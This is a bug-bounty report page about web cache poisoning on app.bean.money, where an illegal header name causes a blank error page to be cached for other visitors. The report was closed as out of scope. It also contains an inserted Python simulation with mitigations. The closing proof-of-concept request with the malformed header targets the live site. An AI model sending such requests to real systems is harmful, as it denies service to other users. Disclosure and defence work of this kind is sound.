Beanstalk Notion

Report #34043

Report Date
August 4, 2024
Status
Closed
Payout

Cache poisoning triggered by illegal input in a header field leads to denial of service in a small scope.

Report Info

Report ID

#34043

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

  • Redirecting users to malicious websites
  • Taking down the application/website requiring manual restoration
  • Persistent content spoofing / text injection issues

Description

Cache poisoning is a type of cyber attack in which attackers insert fake information into a domain name system (DNS) cache or web cache for the purpose of harming users. In DNS cache poisoning or DNS spoofing, an attacker diverts traffic from a legitimate server to a malicious/dangerous server.

Vulnerability Details

These are the points of Cache Poisoning

  1. An attacker sends a simple HTTP request containing a malicious header targeting a victim resource provided by some web server. The request is processed by the intermediate cache, while the malicious header remains unobtrusive.
  2. The cache forwards the request to the origin server as it does not store a fresh copy of the targeted resource. At the origin server, the request processing provokes an error due to the malicious header it contains.
  3. As a consequence, the origin server returns an error page which gets stored by the cache instead of the requested resource.
  4. The attacker knows that the attack was successful when she retrieves an error page in response.
  5. Legitimate users trying to obtain the target resource with subsequent requests will get the cached error page instead of the original content.

Impact Details

Actually, if the scope is large, once the error page is injected, the CDN distributes it to many other edge cache server locations around the world. But here (in this case), the root cause is an illegal character that is accepted as input in a header field.
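To make the five steps above and the impact note concrete, here is an added model of the flow in Python. It is not code from the report, from Beanstalk or from Immunefi: the origin, the shared cache, the 400 status for the malformed request and the names EdgeCache, origin and hardened are all constructed for this illustration (the report only says the response was a blank page). The naive cache stores whatever the origin returns, so one request with a malformed header name leaves an error page that every later visitor receives. The hardened cache shows the two defender-side checks that break the chain: validate header names against the RFC 7230 token grammar at the edge before forwarding, and store only successful, explicitly cacheable responses.

```python
import re

# RFC 7230 "tchar" set: the only characters permitted in an HTTP header field name.
# A lone double quote (the header name used in the report's PoC) is not a token.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def invalid_header_names(headers):
    """Return the request header names that are not valid RFC 7230 tokens."""
    return [name for name in headers if not _TOKEN.match(name)]


def origin(headers):
    """Constructed stand-in for the origin server (assumption, not the real app).

    Like the origin described in the report, it answers a request that carries a
    malformed header name with an error and an empty body; the error carries no
    caching directive, which is the situation a naive cache mishandles.
    """
    if invalid_header_names(headers):
        return {"status": 400, "body": "", "cache_control": ""}
    return {"status": 200, "body": "<html>app</html>", "cache_control": "public, max-age=60"}


class EdgeCache:
    """Minimal shared cache keyed on path only.

    The offending header is not part of the cache key, which is why one request
    can affect every later visitor of the same path.
    """

    def __init__(self, hardened):
        self.hardened = hardened
        self.store = {}

    def fetch(self, path, headers):
        if path in self.store:
            return self.store[path], "HIT"
        if self.hardened and invalid_header_names(headers):
            # Mitigation 1: reject malformed requests at the edge and never forward them.
            return {"status": 400, "body": "", "cache_control": "no-store"}, "REJECTED"
        resp = origin(headers)
        if self.hardened:
            # Mitigation 2: store only successful responses that are explicitly cacheable.
            if resp["status"] == 200 and "max-age" in resp["cache_control"]:
                self.store[path] = resp
        else:
            # Naive policy: store whatever came back, error pages included (the CPDoS condition).
            self.store[path] = resp
        return resp, "MISS"


def victim_status_after_malformed_request(hardened):
    """Replay the report's sequence: one malformed request, then a normal visitor.

    Returns the (status, cache state) the normal visitor sees.
    """
    cache = EdgeCache(hardened)
    path = "/"
    # Constructed requests; the second header name mirrors the PoC's illegal field name.
    malformed = {"Host": "app.bean.money", '"': "1"}
    normal = {"Host": "app.bean.money"}
    cache.fetch(path, malformed)
    resp, state = cache.fetch(path, normal)
    return resp["status"], state


if __name__ == "__main__":
    print("naive cache, next visitor gets:", victim_status_after_malformed_request(False))
    print("hardened cache, next visitor gets:", victim_status_after_malformed_request(True))
```

With the naive policy the next visitor is served the stored 400 with an empty body, which is the blank page the report describes; with the hardened policy the malformed request is dropped at the edge, nothing is stored, and the next visitor gets a fresh 200 from the origin. Real CDNs differ in their default treatment of error responses, so the practical check is to confirm, for the actual edge configuration, that 4xx/5xx responses without an explicit caching directive are not stored.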

References

  1. https://cpdos.org/
  2. https://book.hacktricks.xyz/pentesting-web/cache-deception
  3. https://portswigger.net/kb/issues/00200180_web-cache-poisoning

Proof of concept

Execute this request (under Host: app.bean.money, add the header line ":1); the full request is reproduced at the end of this page.

The response should be a blank page.

Immunefi Response

Immunefi has reviewed this vulnerability report and decided to close it, since it is out of scope for the Beanstalk bug bounty program:
  • claimed impact by the whitehat is in scope for the bug bounty program
  • claimed asset by the whitehat is in scope for the bug bounty program
  • claimed severity is not in scope for the bug bounty program

The project will now be automatically subscribed and receive a report of the closed submission and can evaluate if they are interested in re-opening it. However, note that they are not under any obligation to do so.

Proof-of-concept request (from the report):

GET / HTTP/2
Host: app.bean.money
": 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://app.bean.money/
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers